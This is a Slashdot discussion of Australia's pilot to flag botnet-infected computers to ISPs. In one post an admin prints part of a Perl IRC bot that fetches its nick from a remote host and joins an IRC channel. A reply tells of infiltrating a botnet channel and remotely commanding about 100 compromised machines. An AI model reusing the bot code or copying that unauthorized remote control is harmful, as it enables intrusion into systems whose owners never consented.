AU Government To Pilot Target Zombies 159
msblack writes "
Australian news sources are reporting that the communication regulators will begin notifying ISPs of infected customer computers. In a three-month pilot program, the Australian Communications & Media Authority will identify zombie computers and ask their owners to clean them or risk being disconnected. When will U.S. regulators and ISPs get on board?"
No regulation for me. (Score:5, Insightful)
Well I hope never. ISP should have rights to protect their network so they should be allowed to stop Zombie systems when they feel like it. But for U.S. regulation. I say No way. All regulation does is make loopholes for the bad guys and road blocks to the good guys. ISP should be willing to work with their customers to insure this doesn't happen, that is why a lot of ISP are offing free protection software to their windows users, partially because other big names are doing it so they can stay competitive, and partially because with less spam and viruses on their network they can more easily manage it. With US Government control it will be like your system is a Zombie and Fix it. To most people who only have a passing idea what a virus or spyware/addware is, most really won't know much how to fix it if it doesn't require clicking one button and then selecting the default for all questions. So if it is anything of a difficult fix, or requires hireing expensive techs to fix it they will toss their computer saying it is broken, or sue ISPs and the Government for disconnecting their ISP without giving them a means to remove it. Also systems like P2P, BitTorrent, and some distributive computing systems, all with legal uses, could be considered a zombie system to some some people like the Entertainment industry and can use that to force all people using the technology even for non entertainment uses (such as downloading Linux distros)
Government control adds rigidly defined rules to a flexible universe and often will cause more harm then good.
Re:No regulation for me. (Score:2)
I do some consulting for a couple of local ISPs -ie, I'm the guy who tells people who run them how to set up traffic shaping, firewall rules, etc. And generally, whenever the network gets stuffed with worms, we just block the
Re:No regulation for me. (Score:3, Insightful)
Re:No regulation for me. (Score:5, Insightful)
-matthew
Re:No regulation for me. (Score:2)
Claims that having government body monitoring complaints of illegal actions and spam and taking the proper action of notifying the isp so that action can be taken to prevent further harm to other users and enable the person whose computer is infected from regaining the privacy , are somehow controlling
Re:No regulation for me. (Score:2)
This is, of course, greatly to be encouraged. The more lusers decide their computers are irreparably broken just because of some worm, the more perfectly good m
Re:No regulation for me. (Score:4, Informative)
Yes, regulation is dangerous (Score:2)
We don't need that kind of regulation. No way.
Re:Yes, regulation is dangerous (Score:3, Funny)
Well, if the computer eats your brain, it is probably a zombie computer.
Re:Yes, regulation is dangerous (Score:3, Funny)
Enormous Mutant Star Goat (Score:2)
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:2, Insightful)
People who don't want to wait forever-and-a-day for their ISOs to download. Using a tool like Bittorrent results in *much* quicker downloads (once quite a few people are seeds).
Also, leaving your Bittorrent client running after you finish your download so that others can feed off you is a great way to give back to the community. I only have 384k "up" on my cable connection at home (RR) but if I leave my Bittorrent client running
Re:No regulation for me. (Score:4, Insightful)
The Internet is not a government run operation. The Fed has nothing to do with me getting between 2 ip addresses unless they're .mil. DNS has a thing connection, but there's nothing really substantial about that.
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:2)
This is a truly idiotic analogy. Zombie machines cause no physical harm to anyone, and it is easy to protect yourself from becoming a zombie machine, it is easy enough for ISPs to deal with (many already do). While the government getting involved in the issue has terrible civil libert
Re:No regulation for me. (Score:2)
Zombies are conduit for criminal conduct.
Spammers and criminal gangs that conduct DDOS attacks through zombie networks.
Spammers steal bandwitdh, storage and CPU cycles on the mail servers they deluge with pill and penis spam.
SPAM IS THEFT! Surely a libertarian who is obsessed with his own financi
Re:No regulation for me. (Score:2)
No labor laws != No labor protection. The rights of workers can better be protected by labor unions, consumer unions, professional groups, and other non-government organizations. People should be allowed to form voluntary agricultu
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:2)
The absence of labour laws leads to union-busting.
Funny that those who say that believe that THE O
Re:No regulation for me. (Score:2)
Union-busting is violence, and has nothing to do with "labor laws". Laws against busting heads is good enough. And you statement ignores that through most of history, it was the government and the boys in blue doing the union busting.
No worker protection ALWAYS means that those with the most money screw the workers.
No. In fact most of the worker protection and rights "garanteed" in laws were already commonplace before the laws were created. Unions won the 40
Re:No regulation for me. (Score:2)
Tell that to Wall-Marde employees who get fired for trying to unionize...
Er, no. Child labour was outlawed at the insistence of some industrialists who were compelled to employ children in order to stay competitive. The only way they could go without employing children (which they did not want to do) was by havint it outlawed.
Re:No regulation for me. (Score:2)
No, of course if you crash your car and kill people, that's your responsibility -- and so the burden is on you to make restitution or suffer consequences. And that is your incentive not to drive an unroadworthy vehicle, not state-run rackets selling shiny stickers at $20 a pop.
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:2)
Re:No regulation for me. (Score:3, Interesting)
So they can make money at the expense of others (social freedom = freedom to enslave others).
An anglo-saxon fallacy!
Security is the absolute prerequisite for enjoying one's freedom. If one has to enforce his own freedom, he is so overwhelmed by the task that he has no time/ressources to enjoy his "freedom".
One's freedom **SHALL NEVE
Re:No regulation for me. (Score:2)
You miss the point. It is the ISP best interests to control their network. If their customers are causing things that would cause other ISP to block them or slow down other customers then the ISP will work to keep their customers clean. Most ISPs don't charge by bandwidth anymore, there is no real advantage of having Zombie PCs in their network. If they offer the zombie PC more bandwidth for more pri
Don't forget the other monsters (Score:4, Funny)
They cause MUCH more havoc than simple zombies.
Re:Don't forget the other monsters (Score:1)
http://www.spacetree.com/spacetree20.html [spacetree.com]
Re: (Score:2, Funny)
dangerous (Score:5, Interesting)
slippery slope!
When will people learn? (Score:4, Insightful)
Re:When will people learn? (Score:1)
Not everyone is as savvy as we geeks and know the secret of holding down the shift key when inserting a CD.
Oops, did I just say that out loud?
Re:When will people learn? (Score:4, Insightful)
Re:When will people learn? (Score:1)
Re:When will people learn? (Score:3, Funny)
Stop?
[No] [Yes]
Re:When will people learn? (Score:2)
Re:When will people learn? (Score:2)
Re:When will people learn? (Score:1, Interesting)
It would patch the "You are about to install..." dialog, so instead of saying "Yes" and "No", the buttons would say, "No" and "FUCK No!"
Re:When will people learn? (Score:2)
What happens when there is no notice? (Score:2)
Why do people use cell phones in cars? (Score:2)
Why do people speed?
Why do people not signal their lane changes?
People are going to make mistakes, whether it be malicious, idiocy, or the warm coating of ignorance, they will do things that can potentially harm others. There are laws against most of the things people can do to harm others, but not yet on the Internet.
Why is this? Why must I put up with having my cable modem constantly being scanned? Why, when there is nothing happening on my system, can I generate a several-meg
Such a great headline... (Score:1, Funny)
USA ISP's (Score:4, Informative)
Our local cable and DSL providers are always shutting connections off for userse who's computers are virus-ridden. If your PC is acting as an open spam proxy or found to be connecting to zombie-networks, they shut you off, and you have to call to find out why. They recommend a service or software to help clean your PC, and they won't let you back on until you're free of any malware.
It's been like this for...years?
Re:USA ISP's (Score:1)
Re:USA ISP's (Score:2)
How are they to download the service or software, if the ISP cuts them off?
I am all for closing these pests down, but you have think of the user trying to fix something that now can not be fixed. Maybe isolating them to a micro-net that has one server with the required fixed software loaded. Basicly, ANY webapge they ask for, comes back with a fix it page with a valation link to get them reworked up.
Re:USA ISP's (Score:1)
They won't (Score:5, Insightful)
Pure, raw, unadulterated situation: congress doesn't care. The big ISPs don't care. They have had 10 years to address the situation and have refused all along. They are, however, willing to pass laws preventing unsecured wireless access points. Given a choice between lending support to MPAA/RIAA or actually addressing a serious problem, be it hacking, phishing, worms, viral attacks, DDOS attacks or any other legitimate issue.... look at it like this: how quickly have they acted to prevent the zombie issue? How quickly did they act to try and sneak the broadcast flag into law. Again? Or again?
Start writing campaign checks and picking up the tab for "fact finding missions" to Hawaii for a senator or ten... then you might find some interest on the hill.
I got excited for a second (Score:5, Funny)
My elation was premature. This is just some lame story about computers sending spam.
Come on people! We need to start stockpiling canned goods, fresh water and shotgun shells now! If we wait until the first reports of infection, it may already be too late!
Re:I got excited for a second (Score:2, Interesting)
Re:I got excited for a second (Score:2, Insightful)
They wouldn't have to look far for the source of the infection. Check this guy out;
http://www.aph.gov.au/house/members/member.asp?id
He's even got the voice down right...
No, it's actually happening. (Score:2, Interesting)
How do you say "evil zombies" in French? "Malfaiteurs de Zombi?" I bet some people are wondering that right now (since they can't get to work this morning, what with their cars having been torched by nocturnal zombie throngs). Le *sigh* [cnn.com].
Re:I got excited for a second (Score:2, Funny)
If we wait until the first reports of infection, it may already be too late!
Pittsburgh [theonion.com], for one, shares your concern.
I have a nasty tought... (Score:2, Insightful)
Carte Blanche for ISPs? (Score:4, Insightful)
I agree botnets are a problem and that my ISP has a right to stop me from being a nuisance to the rest of the internet. But outside of that do I really want my ISP taking broad arbitrary decisions on what I can do with my connection?
Echoing previous comments, I hope never (Score:2, Interesting)
Think about what would happen if the FCC were running around sending letters to people about computers that might be sending
Re:Echoing previous comments, I hope never (Score:1)
Government regulation? Not the best way to go about solving the problem. Static rules enforced over a wide spectra of communities will creat
Headline should read (Score:2, Insightful)
Zombies...? (Score:3, Funny)
Zombies are people too! (Score:1, Offtopic)
Zombie Rights!
Re:Zombies are people too! (Score:2)
Re: (Score:1)
Re:filtering to comply (Score:2)
Policy should be: "If your machine sends spam, even without your knowledge, you WILL be disconnected."
Same policy should apply to virus-infected machines, but the big ISPs just do not give a f
This is foolproof (Score:5, Insightful)
From the article: "Anthony Wing, manager of the anti-spam team at the ACMA, told ZDNet UK sister site ZDNet Australia that the application, which took "some months" to build, can identify computers physically located in Australia that are being used for "illicit reasons".
"[The application] identifies IP addresses that have been used for illicit reasons -- for example spamming," Wing said. "There are a range of sensors around that world that identify them. Those infected IP addresses are then fed to the relevant ISP. They know who their customers are so that can contact them... if the computer remains a threat to other Internet users, the ISPs may take steps under their acceptable use policy to disconnect the computer until the problem is resolved".
...The ISPs will then be responsible for contacting their customers and helping them disinfect their computers.
This is great, assuming that:
Re:This is foolproof (Score:2)
Spam sending zombies cant spoof IP addresses. The TCP based SMTP connection requires two way communciation that isnt possible with a spoofed address.
A DDOS is different however, you can spew out all sorts of invalid and malicious packets.
Re:This is foolproof (Score:4, Insightful)
Too Few ISPs enforce forged address prevention (Score:2)
Re:This is foolproof (Score:2)
And for this, you get an Insightful mod? From your own link:
A common misconception is that "IP Spoofing" can be used to hide your IP address while surfing the Internet, chatting on-line, sending e-mail, and so forth.
Re:This is foolproof (Score:2)
And from my own link: "IP spoofing is almost always used in denial of service attacks (DoS), in which attackers are concerned with consuming bandwidth and resources by flooding the target with as many packets as possible in a short amount of time." And distributed DoS (DDoS) attacks are almost certainly the second most common use of zombie PCs, after spamming.
Re: IP Spoofing (Score:2)
Read the article again, folks: "IP addresses that have been used for illicit reasons -- for example spamming." (emphasis added)
The Aussies are after all kinds of zombies, not just spam zombies. Zombie PCs can be (and have been) used to launch DDoS attacks -- and IP spoofing works just fine for these purposes. I said illicit computer operators could spoof their IPs, not that they could spoof it to send spam. Read more carefully!
Carrot and Stick is the key (Score:3, Insightful)
E.g. if the user somehow feels it is necessary, he'll take care of his machine.
I know of people who know full well their computer will get infected with malware. They do it anyway, because they figure it won't cost them anything. Their ISP won't bug them, nor the phone company, nor anyone they DDOS, etc. They simply don't care.
That's why I want multiple waves of hardware-destroying worms. Worms that ruin your mobo month after month, until people wake up and see that proper administration is good for them too.
Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can do is disconnect it, and that just leads to support calsl and whining from the (l)user. Which is why it isn't done (duh!)
Re:Carrot and Stick is the key (Score:1)
However we won't see any of these anymore, virus writeing is now a proffestion, you do it to make money not to see how many peeps you could piss off.
What is the world comming to
Re:Carrot and Stick is the key (Score:2)
Re:Carrot and Stick is the key (Score:3, Interesting)
In many cases, you can block the relevant ports. 135, 137-139, 445, 5000 are among those that can be shut without any users even noticing. Blocking 25 would help, but you can't do that unless you're a monopoly. But, there is a trick out here -- count outgoing mails (-p tcp --dport 25 --tcp-flags SYN,ACK,FIN,RST SYN) and enact
Re:Carrot and Stick is the key (Score:2)
That depends on how you define monoply, if you define it as the only ISP that a user is subscribed to, you can block all you want.
If example.com wants to block port 25 to any computer except mail.example.com it would effect very few users. I would think that off by default would be a good policy for most ports, if I want an unusual port turned on, I'd be happy to explain why and even take a test to demonstrate competency to admin service
Re:Carrot and Stick is the key (Score:2)
A worm that is so destructive wouldn't propagate very easily, now would it?
Another possible incentive would be to fine ISPs for allowing machines on their netblock to send out spam or do other anti-social things -- but that's going to be less effective, because an ISP can't fix the problem on a user's machine. All it can
Re:Carrot and Stick is the key (Score:2)
Destructiveness doesn't limit propogation.
Look at AIDS -- quite destructive. It just kills you after you've spread it to your buddies.
Propogation is helped by animals/computers being able to share things like fluids/data with each other. So WWI was good for breeding a nasty flu, because the hosts were all crammed next to each other. Same for fish ponds: fish diseases/parasites do very well.
A computer network where so many computer
Re:Carrot and Stick is the key (Score:2)
I'm sure the FBI has you on record as say that too.
-matthew
Censorship? (Score:5, Insightful)
As a Telstra customer who saw his cable connection slow to about 1/100th of its normal speed thanks to the DNS attacks of a few months ago, I'm glad to see someone doing something about the problem.
Re:Censorship? (Score:2)
1) If I stand a street corner yelling "The end is near.". I am under free speech, becuase the cost of the listener is 0.
2) If I call you up and said "The end is near.". I am costing you a little of your fixed cost of a phone line.
3) If I fax you and wrote "The end is near.". I am costing you a little fixed cost of the phone line, AND the cost of paper & toner, plus some life of your machine.
In all cases above the message is one directional, I am not
Re:Censorship? (Score:2)
Who is overseeing and investigating the government black-list of Internet users? What recourse will a person have if there has been an "error" in identifying you as a "Zombie"? What techniques does the government use to identify Zombies, and how do we know they won't get a bunch of false positives?
Normally, in a court of law, the government has to prove you guilty beyond any reasonable doubt before they can take sanct
Re:Censorship? (Score:2)
However, I'd like to point out a couple of things:
"Innocent until proven guilty" - When you're driving and speeding or operating recklessly, the police do have a right so stop you, cite you, make you stop driving, and even take you in. If you're operating in a fashion which they deem is illegal and/or unsafe, they're allowed to
Why don't they target IRCops? (Score:5, Interesting)
Let me explain "why I use that holy peice of shit"
The website has a decent sized community. It's also going to be a pain in the butt transferring to something else (i'm thinking vbulletin) and i've never had a problem before the recent round of nuke upgrades. 3 according to the advisories the only patch is to get off phpnuke (again, wonderful)
So today the website freezes up again. Thanks to the fact that i'm dot com broke now I basically sit here all day updating my forums, reading other forums, getting up ocassionally to warm up a microwave burrito and wait for the day Bill Gates makes all of us former window admins disapear to redmond in the great microsoft rapture of 2006.
Ok.. SSH into the machine. Same as before, same exploit.
poo:~# ls
total 20
drwxrwxrwt 5 root root 4096 Nov 6 14:55
drwxr-xr-x 22 root root 4096 Sep 16 14:38
drwxrwxrwt 2 www www 4096 Nov 6 09:40 r0nin
drwxrwxrwt 2 root root 4096 Nov 6 09:40 bot.txt
drwxr-xr-x 2 root root 4096 Nov 6 10:00 enviar.pl
Oh you sons of bitches, you done gone fucked with an admin with nothing better to do than to track you down. I firewalled off port 80, copied the offending files out of tmp and change permissions. Googling revealed r0nin is some kind of shell server. Since 80 and 22 are the only ports open to this machine, they would run it on 80, crashing my website.
Then I looked at enviar.pl. It was just a stupid email script. Nothing notable.
Finally I looked at bot.txt.
# IRC
my @adms=("bigfirex"); #nick dos administradores
my @canais=("#testebot");
use LWP::Simple;
my $dados=get("http://66.185.162.241/...fusao/nick/in dex.php");
my $nick=$dados; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final
my $ircname = $dados;
chop (my $realname = `uname -n`);
$servidor='irc.igs.ca' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento
my $porta='6667'; #porta do servidor d irc
Ahh here it got interesting. I now had a IRC channel, with a room name. I tried connecting, but my machine was banned from the irc server.
I ended up ssh'ing to a customer account I had running at he.net, and firing up BitchX from there. A few minutes later I was in the chatroom #testebot with our magical master of ceremonies "bigfirex"
I sat there for a while seeing folks pop in and out. I asked the room "could you tell me exactly how you're exploiting my machine and would you please not do it again?" No answer from bigfirex.
I decided to ask an IRCop for help. Surely seeing the evidence (I could have provided him shorewall and apache logs) he would take immidiate action banning this guy from the network.
I did a
[msg(elsif)] hi are you an ircop?
[elsif(jake@admin.igs.ca)] sure
[msg(elsif)] someone on your network hacked my webserver and installed a bot, i tracked them back to here
[msg(elsif)] The bot is being run by a user named
[elsif(jake@admin.igs.ca)] sucky. you do know that he.net runs a server on this network, irc.he.net?
[msg(elsif)] actually im just using a shell i have there, the ip for my comprimised machine was banned from this
network
[elsif(jake@admin.igs.ca)] k. I don't know what I can really do for you. I don't know that person and all.
[elsif(jake@admin.igs.ca)] lots of machines are compromised with ircbot trojans that come here in order to get their
Re:Why don't they target IRCops? (Score:5, Interesting)
However, it isn't their job to enforce controls that you deem necessary. We can use the example of bit torrent trackers. The irc server is like a bit torrent tracker. The owner/operator of the tracker is not responsibile for the torrents (in your case irc channels) that use his server/tracker. What's to stop the botnet operator from moving to another network?
This actually happened to me once. One of my friends machines was r00ted, and he asked me to help him out. So what I did was to run lsof, to grab a list of opened files.
I ran strings on some of the binaries I came across, found an irc channel, and joined it. When someone found out that I wasn't supposed to be their, I was kickbanned. I ssh'd to another machine, changed my ident and nick to match their patterns and joined the chan. I also spoke with the admin via pm, to find out what was going on etc.
Turns out it was a couple of malaysian kids, running an irc server on a hacked machine with a carded domain name. They told me how the binary works, that it would only respond to a particular nickname, not requiring a password. I tried to change to that nick, and the services bot banned me.
Connecting again from another IP, I realised services was running on a separate machine, and assuming hacked machines don't have the highest of stabilities, I joined the chan again, and wrote a script to disinfect all of the 100 or so other machines in the channel. So, armed with the knowledge I'd gathered from these kids after befriending them, and promising them several 0day exploits, and a stable shell (to run an irc server), I found out everything I needed to remove the program.
Staying connected this time, the script would wait until the services bot dropped its connection, at which point I changed my nickname, told all 100 machines to edit their crontab, and to kill -9 the program. The malaysian kids came back, utterly disappointed that their efforts were wasted, removed the domain, killed the irc server, and haven't been heard from since (however they may have simply gotten better at what they did).
Anyway, to bring a long story to a close, keep on tracking it, run the binary, or program from a machine you don't mind having compromised, sniff with ettercap, befriend your attackers (socially engineer them), and responsibly eliminate their arsenal, you'll save other admins the trouble (too bad they probably won't even know about it).
Good luck with it.
Re:Why don't they target IRCops? (Score:4, Insightful)
I am an IRCop on a very small network which had a botnet problem last year. Hundreds and hundreds of bots would connect, all joining channels. We wrote scripts to ban all the bots, upgraded services, the whole lot. They keep coming. Some of them came to new channels. The "owners" hadn't showed up at this point, not even once. After around 5 days some people showed up in those channels from ISPs in the middle east. I did track them down, and sent abuse emails to their ISPs. Got a response in a few days, offending account shut down. But that account was probably another 0wned box anyways.
Unfortunately sending ISP abuse emails to all of the bot IPs was much too daunting a task for a small time IRC network.
Keeping unwanted things off an IRC network is hard work. Kiddies often have hundreds of open proxy and otherwise usable IPs to use for ban evasion.
I hate to be brutally honest, but you share a lot of responsibility. *Your* IP was abusing his system.
Re:Why don't they target IRCops? (Score:2)
Let me get this straight: A guy finds out that his machine has been compromised. He does the right thing and reports it to the admin who is responsible for maintaining the resource from where the attack was launched. He even goes out of his way to do so. And you would be ticked
Re:Why don't they target IRCops? (Score:2, Insightful)
This person didn't try to "report it to the admin who is responsible for maintaining the resource from where the attack was launched." He
Re:Why don't they target IRCops? (Score:2)
"Regulators"? (Score:2)
Never, I hope. Do you want to be forbidden to use an unlicensed operating system?
Hint: I think you meant to write "law enforcement" rather than "regulators".
Implications (Score:2)
I am all for some sort of system that finds a way of shutting down bots and will even admit that I would not mind seeing user's required to care for their computers (making them responsible for what is on their machines). Having said that, my experience is that so far in the cyber-world, governments have not been able to pass legislation that deals with these kinds of things in an effective manner. Governments are too much "brick and mortar" to
The money flow (Score:4, Insightful)
Never , because alll U.S. lawmakers are in the pocket of Big Zombie.
When hell will freeze over (Score:3, Insightful)
I'm on this task squad (Score:3, Funny)
We had to think of something quick so I told him we were cleaning infected zombies from the network, which, if you think about it, is at least partially accurate. He then left muttering something about "keep up the good work" and next thing I know suddenly all the other managers and politicians want their networks cleaned. Now it's a national headline.
Hey! My bad!
When will U.S. regulators and ISPs get on board? (Score:5, Insightful)
ISP's should be protecting their own networks. Saved bandwidth costs alone should be enough reason for them to want to detect and block zombies. The last thing we need is more government intervention.
Wouldnt it be in the ISPs interest to stop this? (Score:2)
But more to the point, having this stuff on their network spewing data chews up bandwidth (and bandwidth isnt free)
A good place to start is for ISPs to block ports known to be used by these zombies (e.g. the port that the "owners" of the zombie network use to send commands/targets/spam messages etc to the zombies). Blocking these ports probobly wouldnt cost very much and would (in theory) stop the zombies from actuall
MyBot (Score:2)
Seems like you can't have it both ways. (Score:2)
Personally (and as a network sysadmin for a building network... not an ISP, but close) I'm all for restrictions on what happens on the network. In my building, if I don't notice what you are doing, I'm not going to stop you; ho
Dont' they do this already? (Score:2)
They already do in Canada, at least some ISPs (Score:3, Informative)
After my clients said on the phone, that "I will try and maintain a infected free computer , and run current antivirus software", they reconnect my clients.
I don't actually so mind that they disconnect people, if they are infected with some sort of virus. Saves the rest of the people from being infect.